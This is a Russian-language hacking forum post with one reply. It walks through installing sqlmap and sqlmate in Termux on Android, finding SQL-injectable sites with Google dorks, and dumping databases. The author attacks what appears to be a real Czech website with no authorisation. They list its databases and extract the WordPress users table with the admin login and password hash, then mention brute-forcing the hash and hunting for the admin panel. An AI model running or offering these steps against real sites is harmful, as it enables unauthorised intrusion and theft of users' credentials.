Что нового?

SQL injection на андроид. Termux + Sqlmap == dump :)

₱RÂĐØ

Новый пользователь
Пользователь
Регистрация
28 Фев 2019
Сообщения
6
Баллы
0
491
В прошлой статье я показал где найти, как установить эмуль и подключить нужную клаву.
Сегодня рассмотрим поиск и эксплуатацию сайта уязвимого на sql injection в termux с последующим dump'ом.

Искать мы будем по гугл доркам с помощью проги sqlmate, ну а все остальное по старинке с помощью sqlmap.

Поехали.
Для начала обновляемся все установленные пакеты до последних версий.

Пишем:
apt update -y && apt upgrade -y

492

Обновились, теперь ставим обе версии python коммандой:
pkg install python2 && pkg install python

Питон нужен для запуска нашего софта, ибо он на нем же и написан) Да и большинство hack софта написано на питоне, изредка там перл или рубик, ну и иногда пыха еще. Ну, именно под термукс. Так что вот так вот.
Если спросит че то, пишем просто "y" типо как да (yes).

493

Ну а у меня он уже установлен, так шо идем дальше и ставим sqlmap.

Для тех, кто не знает:
Sqlmap - это инструмент для петеста веб приложений. Проверяет на наличие sql injection линк и помогает через дыру залезть в базу данных, исполнять произвольные запросы к ней, простыми словами. Так же заметил, что и XSS определяет там слегка. Но кроссом не занимался пока).

Для установки пишем:
pkg install git -y
git clone --depth 1

Please Login or Register to view hidden text.

sqlmap-dev

Установили, дальше заходим в папку с прогой:
cd sqlmap-dev

Даем права:
chmod +x sqlmap.py

И запускаем:
python2 sqlmap.py

494

В итоге вот так выглядит sqlmap.
Список комманд и пояснение к ним можно найти здесь(не реклама)

Please Login or Register to view hidden text.

.

Теперь о sqlmate.
Sqlmate это хороший друг sqlmap, ибо вдвоем они работают довольно таки хорошо)
Собстно :
-Ищет сайты по доркам. Комманда --dork Дорка.
-Есть брут хэшей пасов md5, sha1 и sha2. Запускается коммандой --hash Сам хэш.
  • Умеет искать админки коммандой --admin. База админок вмещает 482 ссылки, что довольно таки не плохо)
  • Дампит дорки в тхт коммандой --dump и цифра. Например --dump 1 это получится 20 дорков. 1 = 20 проще говоря
495

Идем на гит и ставим sqlmate.
Пишем:
git clone

Please Login or Register to view hidden text.



После того как скачается sqlmate пишем:
cd sqlmate

Даем права:
chmod +x sqlmate

Устанавливаем зависимости для проги:
pip2 install -r requirements.txt

Далее запускаем коммандой
python2 sqlmate

496

Сразу появился инпут и можно ввести дорку. Я буду искать по category.php?id=

499

Таак, посмотрим. Sqlmate похоже что то нашел, zbs.


Агась, не обращайте внимание на мой

Please Login or Register to view hidden text.

, я просто сейчас в чехии, вот он и ищет в этой зоне сайты чешские) Дальше открываем вторую вкладку



Опять же заходим в папку с sqlmap:
cd sqlmap-dev

Пишем:
python2 sqlmap.py -u

Please Login or Register to view hidden text.

--random-agent --threads 10 --dbs
-u это Урл сайта
--dbs // это комманда чтоб показать бд сайта
--threads кол. потоков // многопоточность
--random-agent // это рандомный юзер агент, ибо дефолтный палевный.
И ждем, попутно отвечая на вопросы, которые задает скуль.
Если все отлично, то в итоге вы получите список баз как результат.



Теперь смотрим какие базы есть. Таксс, information_schema нам нах не надо. Это дефолтная база, там обычно ниче интересного нету. Еще есть две базы, это thejob_jil и wordpress471. Начнем с thejob_jil.
Пишем в консоль:
python2 sqlmap.py -u

Please Login or Register to view hidden text.

--random-agent --threads 10 -D thejob_jil --tables

Малеха поясню:
-D название базы // указываем название базы, с которой будем тянуть таблицы и колонки
--tables // означает, что мы хотим вытянуть таблицы, какие там есть, их названия с базы



Ооо, заепца, есть wp_users. Там наверное точно есть что то интересное. Ща глчнем
Пишем:
python2 sqlmap.py -u

Please Login or Register to view hidden text.

--random-agent --threads 10 -D thejob_jil -T wp_users --columns

Новые ключи:
-T название_таблицы // ну тут понятно
--columns // говорим скулю мол нам надо колонки с этой таблицы вытащить.



Смотрим:



То, что нужно) Табла с логинами, мылами и пассами юзеров. Ну что ж, осталось дампануть и глянуть количество и не пусты ли эти коллрнки, а то и такое бывает если честно)

Для этого пишем:
python2 sqlmap.py -u

Please Login or Register to view hidden text.

--random-agent --threads 10 -D thejob_jil -T wp_users -C user_login, user_pass --dump

Поясню:
-C название,название,название //выбираем колонки под дамп
--dump // ну это понятно, команда на дамп)



Нуу, вижу тут чисто акк админа и его пасс в хэше, еще и от алгоритма wp и соленный скорее всего. Даж малеха расстроился, ведь на момент написания статьи я расскручивал и сразу писал статью, как бы на одном дыхании)
Тут уже остается брутить и искать админку на сайте, но это уже другая история т.к сказать.

На этом все.
Спасибо за внимание, надеюсь статья была полезной кому-то.
Да и пишу с мобилы статьи,так что не знаю как видон с компа у них. Если что - скажите, я отредактирую. Благодарю.
 

Arslan186

Новый пользователь
Пользователь
Регистрация
11 Авг 2019
Сообщения
1
Баллы
0
Спасибо за статью! Буду теперь разбираться! К тебе если что можно будет обратиться с вопросами? И куда?